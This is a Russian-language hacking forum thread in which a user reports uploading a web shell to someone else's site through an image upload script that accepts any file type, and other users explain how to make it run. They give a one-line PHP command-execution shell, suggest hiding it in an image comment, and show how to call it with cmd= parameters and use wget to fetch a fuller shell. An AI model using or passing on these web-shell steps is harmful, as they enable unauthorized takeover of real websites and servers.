Зальем файлы на сайт через get_image.php
 

На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..

Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.

Все файлы появляются в папке /www.site.ru/img/

Какие есть варианты? :)

залил.
После нажати я на кнопку добавить как и обычно вылелтел адресок куда все зелетело.
Выдалось http://..ru/img/1147031229.jpg
Нажимаю ничего не происходит..хотя через Ie он выдает текст shella
Что мне с ним делать?

Вот по хорошему его как нить залить в другую папку..через этот get_image.php
Какие мысли еще, народ?

Если нужно то могу этот исходничек get_image.php осветить.

Попробуй
http://site.ru/index.php?cmd="php shell.jpg"

Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..

Это я предлогал но моё сообщение пропало куда то(
Вообщем команды там будут типа http://site.ru/img/fail.php?cmd= и тут команда типа uname -a воть а залить моно так ls -la

Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись

К сожалению или к счастью у меня нет огромного опыта в этих делах..дабы поэтому и спрашивал.
Можно мне написать подробно на счет fail.php?cmd=...(так как пока мне не покажешь..черт побери я так и не пойму..)
Заранее благодарен.
Я хотел бы научится, да вот только не знаю что да где..

djhoof статей по етомe поводу уйма почитай немного!!!
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда